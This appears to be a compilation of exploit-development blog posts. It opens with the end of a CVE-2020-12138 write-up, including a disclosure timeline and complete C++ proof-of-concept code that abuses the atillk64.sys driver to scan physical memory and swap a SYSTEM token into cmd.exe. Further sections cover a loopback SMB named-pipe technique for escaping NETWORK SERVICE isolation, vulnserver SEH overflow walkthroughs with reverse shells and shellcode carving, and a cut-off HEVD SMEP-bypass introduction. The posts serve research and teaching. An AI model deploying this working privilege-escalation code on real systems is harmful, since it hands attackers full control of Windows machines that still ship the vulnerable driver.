This number can be toned down and the exploit could be trivially tweaked to search very small sections of physical memory at a time before exiting, annotating along the way and printing any valuable EPROCESS structure information to the terminal as it progresses. It could for instance be tweaked to search n amount of physical memory, output the location and token values of any privileged process or the cmd.exe process, and then exit while specifying the last memory address that it mapped. You could then start the exploit up again but this time specify the new last memory address mapped and map n from there and repeat until you had everything you needed.

The hardest part was finding the cmd.exe process. Likely-to-be-SYSTEM processes were easy to find. If you have a remote-desktop/GUI equivalent access to the host machine, you could open a few cmd.exe processes and greatly improve your odds of finding one to overwrite and elevate privileges.

Even with just one cmd.exe process, I was able to find and overwrite my token roughly 90% of the time. With more than one, it was 100% in my testing.

There are some improvements that can be made to the exploit no doubt, but as is, it works really well in my testing and can be tweaked fairly easily. I believe it sufficiently proves the vulnerability.

Mandatory screenshot:

Huge Thanks

Huge thanks to @FuzzySecurity for all of the tutorials, I’ve recently also finished up his HEVD exploit tutorials and have learned a ton from his blog. Just an awesome resource.

Thanks to @HackSysTeam for the HackSysExtremeVulnerable driver, it has been such a great learning resource and got me started down this path.

Thanks to both @ihack4falafel and @ilove2pwn_ for answering all of my questions along the way or helping me find the answers myself. Very grateful.

Thanks to @TheColonial for his advice about disclosure and his awesome CAPCOM.SYS YouTube video series. I learned a lot of nice WinDBG tricks from this.

Thanks again to @jessemichael for being so helpful and charitable.

Thanks to Jackson T. for not only his blog post but for answering all my questions and being extremely helpful, really appreciate it.

And finally thanks to all those cited blog authors @rwfpl and @hatRiot.

All testing performed on Build 18362.19h1_release.190318-1202.

Please, let me know if you find any errors.

Disclosure Timeline

  • February 25th 2020 – Email, Customer Service Ticket, and Twitter DM sent to GIGABYTE USA
  • February 26th 2020 – Email to AMD [email protected] notification of vulnerability found and PoC created
  • February 26th 2020 – Response from psirt to send PoC
  • February 26th 2020 – PoC sent to psirt
  • March 7th 2020 – Ask for update from psirt, no update given
  • March 16th 2020 – Ask for update from psirt
  • March 16th 2020 – psirt responds that the issue has been previously reported and that they don’t support the product as a result
  • March 16th 2020 – I inform psirt that other parties are still packaging and installing the driver and there is no advisory for the driver
  • March 24th 2020 – psirt states that support for the driver ended in late 2019 and to contact GIGABYTE directly
  • April 14th 2020 – No response from GIGABYTE USA, request CVE
  • April 24th 2020 – Assigned CVE-2020-12138, blog posted

Exploit Code

// CVE-2020-12138
// EOP Exploit POC for atillk64.sys by @h0mbre_
// C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys
// Driver vulnerability referenced in: 
// https://github.com/eclypsium/Screwed-Drivers
// https://eclypsium.com/2019/08/10/screwed-drivers-signed-sealed-delivered/

#include <iostream>
#include <vector>
#include <algorithm>
#include <Windows.h>
#include "h0mbre.h"
using namespace std;

#define DEVICE_NAME         "\\\\.\\atillk64"
#define IOCTL               0x9C402564
#define START_ADDRESS       (INT64)0x200000000   // based off testing my VM
#define MAX_ADDRESS         (INT64)0x240000000   // based off testing my VM

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

// Creating struct for our input buffer to DeviceIoControl
typedef struct {
    INT64 start_address;
    DWORDLONG num_of_bytes;
    DWORDLONG padding;
} INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag and that Proc chunk's 
// header size
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

// Grabs handle to atillk64.sys
HANDLE get_handle(const char* device_name) {
    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to atillk64.sys.\n";
        exit(1);
    }
    else
    {
        string hex_output = pretty_hex((int)hFile);
        cout << "[>] Successfully grabbed handle to atillk64.sys: "
            << hex_output << "\n";

        return hFile;
    }
}

// Mapping memory from a physical address to our process virtual space
PROC_DATA map_memory(HANDLE device_handle) {

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    string hex_output = pretty_hex((int)output_buff);
    cout << "[>] Output buffer allocated at: " << hex_output << ".\n";

    DWORD bytes_returned = 0;

    PROC_DATA proc_data;

    // failures == unsucessful DeviceIoControl calls
    int failures = 0;

    // How many legitamate "Proc" chunks we've found in memory as in
    // we've confirmed they have headers.
    int proc_count = 0;
    int iteration = 0;
    cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;

                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);

                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of two vectors, one holds Proc chunk address
    // one holds header-size for that Proc chunk.
    return proc_data;
}

void parse_procs(HANDLE device_handle, struct PROC_DATA proc_data) {

    INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // memebers ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

void ascii() {

    cout << "\n\n\t     CVE-2020-12138 Proof-of-Concept\n";
    cout << "\t   EOP in ATI Technologies atillk64.sys\n\n";
    cout << "\t\t\t       by @h0mbre_\n\n\n";
}

int main() {

    ascii();

    // Grab handle to our device driver atillk64.sys
    HANDLE hFile = get_handle(DEVICE_NAME);

    // Return a pointer to our output buffer
    PROC_DATA proc_data = map_memory(hFile);

    // Look through our PROC_DATA struct for the values we need, ie EPROCESS
    // members for the processes we're interested in
    parse_procs(hFile, proc_data);
}

Sharing a Logon Session a Little Too Much

By: tiraniddo
25 April 2020 at 23:34
The Logon Session on Windows is tied to an single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? We'll if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Is there any primitives which SMB supports which allows you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) { 
>>     Get-NtProcess -ProcessId 1152 
>>  }
PS> $p.GrantedAccess
AllAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) { 
>> Get-NtToken -Impersonation 
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

SEH Based Buffer Overflow

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability

Kali Linux
Windows Vista
Vulnerable application: vulnserver.exe (GMON)


Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:



~~~~~//********//~~~~~~


Once the application has been downloaded, we run it on our Vista Machine and start fuzzing.


Fuzzing

For fuzzing, I will be using boofuzz, and documentation can be found here:


First off, we connect to the application to test its functionality--specifically, we will  be testing the GMON command as shown below


Here is the boofuzz template/proof-of-concept that I used for fuzzing:


We fire up this python fuzzer and get a crash. 


With boofuzz, it generates a fuzzing result that can be further accessed using a DB application. For this, I am using a sqlitebrowser that provides a nice SQLite GUI.

We can see in this result (line 24) that our fuzzer sent 5013 bytes before the crash occurred



Proof-of-concept


Here's the original proof-of-concept that I will be using throughout the exploit development 

We will begin by recreating the crash using this POC


We fire up this POC and examine the crash in Windows Vista using Immunity Debugger. 

We successfully get a crash with our buffer of 41s. 

Since this will be an SEH based buffer overflow, we look at the crash in SEH chain which shows that SEH handler address being overwritten with our 41s


After being able to successfully overwrite the SEH handler, we then need to figure out the correct offset. This can be done by feeding our POC with unique characters of 5100 bytes long. 

We will be using Metasploit's pattern_create.rb as shown below.



We then update our POC with the following unique chars and again fire up our exploit.



The POC successfully crashes the vulnserver.exe program again and follow the crash in immunity.

Here we can see that SEH has been overwritten with the following values:
326E4531 & 45336E45


We can use these two values to calculate the offset using Metasploit's pattern_offset.rb

Note: Immunity Debugger's mona.py can also be used to create the pattern_create and pattern_offset

We get the following offset:

SEH: 3519
nSEH: 3515


We can use these offset values to update the POC one more time and recalculate our buffer


Again, we fire up the updated POC and examine the crash in immunity.

We can see that nSEH has been overwritten with x42s and the SEH has been overwritten with x43s


Redirecting the SEH Handler

At this point, we have successfully accomplished the following:

1. Fuzzed the vulnerable application given a long string of buffer 
2. We have calculated the offset for the SEH Handler

One common way (or only way?) to exploit a buffer overflow vulnerability is using the POP-POP-RET 

This is possible because when an application crashes and the SEH happens, our malicious buffer is loaded into the stack and the crash makes this buffer accessible using the POP-POP-RET sequence of instructions.

More information about POP-POP-RET can be found in this blog:



Bottom right of the immunity debugger crash below shows the current state of the stack after the crash
Our buffer is loaded at address 00FDF1F0 (note that addresses 00FDF1E8 and 00FDF1FC will need to be pop from the stack)

POP - 00FDF1E8
POP - 00FDF1FC
RET - 00FDF1F0 (returns our buffer)



Bad characters are no bueno

Before we look for a POP-POP-RET address and redirect our SEH Handler to it, we need to discover bad characters that will truncate or mangle our exploit.

Searching for bad characters can be accomplished by feeding 255 unique hex characters and follow code execution in immunity debugger to see it certain hex characters truncate or mangle our buffer


Again, execute our POC and trace code execution in immunity debugger. 

Looking at the hex dump (bottom left), we can see the application took all 255 hex characters (0x01 to 0xff) which means that other than  0x00, all hex characters can be used.


Now we are ready to find any POP-POP-RET address. This can be done using the mona.py plugin in immunity debugger (I couldn't get it to work) or you can just do it manually by opening up the essfunc.dll and searching for these sets of instructions.

I found the POP-POP-RET at address 625010B4


Once again, we update our POC with the SEH Handler redirect address. We examine the crash by adding a breakpoint at address 625010B4 and see if we can hit the breakpoint for a successful redirection.

Note that the address has to be in little-endian format. Also, we added a first jump (EB 06) and 2 NOPs.



We get a another crash, examine the SEH chain which shows our POP-POP-RET address and if we allow the exception to happen, we are successfully redirected to address 625010B4



We step through the POP-POP-RET codes and we then hit our first jump (EB 06).


...once we take the jmp and hit the address 00EFFF7D. This gives us roughly about 70 bytes of address space. This space is not enough to get a reverse or bind shellcode however, we can utilize this space to further jump.


For our second jump, I am using the following instructions which were straight from the OSCE course. 

These instructions basically moves the address of EIP to ECX then 8 bytes of ECX gets decreased before the jump is taken.


These instructions can be created to a nasm file then objdump can be used to generate the opcodes. 

Below shows these instructions and their respective opcodes


Note that at this point, ecx points to address 00EFFD87. We step through the instructions, take the jump and follow the new EIP 00EFFD87 in dump which gives us a bigger address space…512 bytes to be exact
00EFFF8B - 00EFFFD87= 512 in decimal

We update our POC once again with these jump instructions and now we are afforded an address space big enough for our shellcode.


SHELL TIME!

We create a reverse shell.


We update our POC buffer one last time


We execute our POC again and follow code execution in our debugger

And after taking our second jump, we hit our NOPs and if we follow the eip in dump, we can see that our encoded shellcode is just right below it.


If we continue code execution, we hit our shellcode and get a reverse shell in kali


Final POC




Conclusion:

  1. Fuzzed the vulnerable application given a long string of buffer 
  2. We have calculated the offset for the SEH Handler
  3. Determine if there are any bad characters
  4. Found a POP-POP-RET address to access our buffer
  5. Use the 4 bytes @ offset 3515 to do our first jump for a 70-byte address space
  6. Use the 70 bytes address space for the second jump which gave us 512 bytes of address space
  7. Add shellcode

SEH Based Buffer Overflow with Restricted Characters

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability w/ Restricted Characters


Kali Linux
Windows Vista 
Vulnerable application: vulnserver.exe (LTER)


Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:



Github: https://github.com/pyt3ra/SEH-based-Buffer-Vulnerablity-128-Restricted-Hex-Characters-

~~~~~//********//~~~~~~

Fuzzing 

Fuzzing with boofuzz



We open the boofuzz result using SQLite browser


Recreating the crash with our Proof-of-concept


As usual, we examine the crash using Immunity Debugger and see that our SEH handler address has been overwritten with our buffer



Calculating Offset

We use Metasploit's pattern_create.rb and pattern_offset.rb to generate unique characters and calculate the offset.

Updated POC


The following values overwrite the SEH handler


...which then equates to the following offset positions.


Once again, we update the Proof-of-Concept with the following offset calculations and verify if we can see these values after the crash



Finding restricted characters


After running a few test, it looks like anything over 7F is being subtracted by 7F as we can see below in our dump….such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f


At this point we have successfully done the following:

1. Successfully produced a crash to the program with the buffer we provided
2. Calculated the offset values for address redirection
3. Found all the restricted characters

POP-POP-RET...the key to SEH Based Buffer Overflow Vulnerabilities


I will be using the same POP-POP-RET address from the Vulnserver.exe (GMON) write-up


Updated the POC with the following values...I also added some nopes for the other 4 bytes


We cannot forget about the restricted characters (hex 80 to FF)

We get a crash, however, we can see that our POP-POP-RET address has been changed to 625010B4 to 62501035 where the last byte has been changed (B4 - 7F = 35)

Also note, that our 90s have been changed to 11 (90 - 7F = 11)...we will worry about this part later


We found another POP-POP-RET address


Again, we update the POC with this new POP-POP-RET address


We fire up the POC and set a breakpoint in immunity. As we check the SEH chain plugin, we can confirm that we were able to redirect the SEH handler to the address 6250120B


We allow the execution and hit our breakpoint


We step through the POP POP RET instructions, and we hit our first entry (x90s) or in this case, x11s (90 - 7F)


First Jump 

After we are redirected to the pop-pop-ret address we are then sent to the 4 bytes right before it. We will have to use these 4 bytes to get our first jump

For the first jmp we will use the jnz conditional jump and fill the extra bytes with inc eax. With GMON we used EB 09 or jmp 9 bytes, however, EB is unusable since it is one of the restricted characters.

At this time, eax is currently 0x00000000 so I used the inc eax (41) to disable the ZF. Then do the jump-if-not-zero (jnz) instruction

This jumps pass our SEH handler address…also, note that if we follow it in the dump that we can see we only have 48 bytes of address space…not enough for a reverse/bind shell.


Second jump

Now we have 48 bytes that we can use to do our second jump while keeping in mind the restricted characters
 To circumvent the restricted characters, we will be 'carving' our shellcode with SUB instructions

More info about shellcode carving can be found here: http://vellosec.net/2018/08/carving-shellcode-using-restrictive-character-sets/

First, we will need to realign our stack so that we will know where our decoded jump will show up. In this case, we want our decoded jump opcodes just below our first jump at the following address:



Before we carve it out, we have to realign ESP to address 00E9FFF8 which can be done with the following instructions:

(1)
push esp
pop eax               ;move the value of esp to eax
add ax, 0d75      ;add 3445 to eax
add ax, 0465      ;add 1125 to eax
push eax             ;push new eax value to the stack
pop esp              ;move the value of eax to esp

Note that after we do this, we will need to zero out eax for shellcode carving to work

There are multiple ways to zero out eax (i.e. xor eax, eax), however, this will not work due to restricted characters

We will use the AND operator using the following values

(2)
AND 554E4D4A = ‭101 0101 0100 1110 0100 1101 0100 1010‬
AND 2A313235 = ‭010 1010 0011 0001 0011 0010 0011 0101‬
--------------------------------------------------------------------------------
                             =000 0000 0000 0000 0000 0000 0000 0000

(3)
For our second jump, we will be using a reverse short jump: EB 80 

In order to carve out EB 80 we use the following values:

\xeb\x80\x90\x90 = 6464 7F15
0 - 909080EB = 6F6F7F15
 32103355 + 32103355 + 0B4F 186B = 6F6F7F15
0 - 3210 3355 - 3210 3355 - 0B4F 186b = 909080EB

We will do SUB operations with these values then push the result to the stack

After everything is said and done, our second jump will look like this



We execute our updated POC and trace code execution in immunity debugger

Here we can see that our second jump instructions starts at address 00EFFFD1 and then the EB 80 instructions are carved at address 00EFFFFA

Once we take the jmp short 80h, we get another 72-byte address space that we can work with. This can be seen in our hex dump at address 00EFFF7C


Third Jump

After the second jump, the address space is still not big enough for reverse or bind shell...which means we will need to do another jump.

As usual, we will need to realign ESP to set where are decoded instructions will be saved. In this case, ESP currently points at address 00FAFFFD and we would like to point it to 0FAFFAE.

After we store the value of ESP to EAX we execute the following SUB instruction

SUB AL, 4F (00FAFFFD - 4F = 0FAFFAE)

We then pop this address back to ESP


After we run the following instructions, we can see that ESP points to address 00FAFFAE…this is where our decoded jump instructions will be stored


For the third jump, we will be using the following instructions:


\x81\xec\x48\x0d\x00\x00 (SUB ESP, 0DA0)
\xff\xe4                                   (JMP ESP)
00FAFFAE - 0DA0 = 00FAF20E

00FAF20E is the address that is just below the beginning of our buffer....this will give us about 3400+ bytes worth of address space for our final shellcode

We will be carving 4 bytes at a time beginning at the lowest 4 bytes (since this will be pushed into the stack in LIFO manner)

As usual, we zero out EAX first then carve the instructions using SUB instructions before EAX gets pushed into the stack


Here we can see our 4 bytes getting decoded at address 00D0FFBF


...we carve out the next 4 bytes


...and follow the instructions being decoded


This completes our third as we can we have success decoded our next jump instructions @ address 00D0FFBB:

SUB ESP, 0D48

JMP ESP


We continue code execution to get to our SUB ESP and JMP ESP

Here we can see that after the SUB instruction, our ESP point 00D0F273


We take the JMP ESP and we are provided with 3000+ bytes of address space for our final shellcode


Final Shellcode 


At this point, we can use MSF to create a reverse shell encoded with alpha_mixed.

Also, note that we need to add BufferRegister=ESP to get rid of some restricted characters at the beginning of the shellcode. 

More info about BufferRegister flag can be found here: https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/



Buffer Overflow w/ Restricted Characters

 Buffer Overflow Vulnerability w/ restricted characters

Kali Linux
Windows Vista
Vulnerable application: vulnserver.exe (LTER)


Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:



~~~~~//********//~~~~~~


For the LTER command, there are two ways to exploit the buffer overflow vulnerability, however, both exploits will have similar restricted characters

- Part 1: Vanilla Buffer Overflow w/ Restricted Characters
- Part 2: SEH base Buffer Overflow w/ Restricted Characters.....click here for  Part 2

Let's get started...

Fuzzing

Similar to the GMON write-up, I used boofuzz to do the initial fuzzing.

...and after crashing the program, we recreate the crash using the follow Proof-of-Concept


We get a pretty vanilla buffer overflow where the EIP has been overwritten with 41s

Also note that ESP currently points to our buffer. This is key once we figure out an address to redirect our EIP


Now we will need to determine our offset and see exactly which part of our buffer overwrites the EIP register.

As usual, this is accomplished using Metasploit's patter_create.rb to generate 3000 unique characters.


Update our POC with our unique characters, send the exploit, and examine the crash in immunity debugger.


Here we can see that EIP has been overwritten with the following values: 386F4337


Metasploit's pattern_offset.rb can be used to determine the offset with this value.

Once we determine the offset, we update our POC again



We send the POC one more time and examine the crash...if our offset is correct, EIP should be overwritten with x42s

In this case, we can see 42424242 were successfully loaded into the EIP register


Finding bad characters

Now that we are able to redirect our EIP...we will need to find an address to redirect the EIP. Since we know that ESP register points to our buffer, we will be looking for a JMP ESP address.

However, before we choose an address, we will need to verify if there are any bad characters.

We update the POC with the following 256 unique hex characters


After running a few test, it's verified that anything over 7F is being subtracted by 7F as we can see below in our dump….such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f



Now we will need a call esp or jmp esp address…this will ultimately call our 'Cs' where our reverse shell will be loaded while Kkeeping in mind the restricted characters.

We find the following address using mona.py in immunity debugger

FF E4 = jmp esp
Address: 62501203


We can verify this address is a JMP ESP by searching it



At this point, we can updated our EIP to redirect to this JMP ESP  address


As we follow the crash in immunity, we can see that EIP has been successfully overwritten with our JMP ESP address


...once we take the JMP ESP, we are redirected to the top of our Cs




Reverse shell time!

We will need to create our revere shell to encode it with x86/alpha_mixed in order to avoid the restricted characters


We update our POC one last time

Again we follow the jmp esp and we hit the beginning of our reverse shell. We let the code execution continue and successfully get a reverse shell in our Kali listener.



Final Proof-of-Concept




HEVD Exploits – Windows 10 x64 Stack Overflow SMEP Bypass

By: h0mbre
4 May 2020 at 04:00

Introduction

This is going to be my last HEVD blog post. This was all of the exploits I wanted to hit when I started this goal in late January. We did quite a few, there are some definitely interesting ones left on the table and there is all of the Linux exploits as well. I’ll speak more about future posts in a future post (haha). I used Hacksys Extreme Vulnerable Driver 2.0 and Windows 10 Build 14393.rs1_release.160715-1616 for this exploit. Some of the newer Windows 10 builds were bugchecking this technique.

All of the exploit code can be found here.

Thanks

  • To @Cneelis for having such great shellcode in his similar exploit on a different Windows 10 build here: https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
